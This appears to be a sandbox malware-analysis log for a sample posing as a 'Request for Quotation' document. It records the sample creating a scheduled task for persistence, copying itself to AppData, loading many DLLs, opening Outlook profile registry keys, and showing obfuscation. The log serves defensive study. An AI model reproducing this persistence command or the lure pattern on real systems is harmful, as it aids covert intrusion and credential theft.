Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

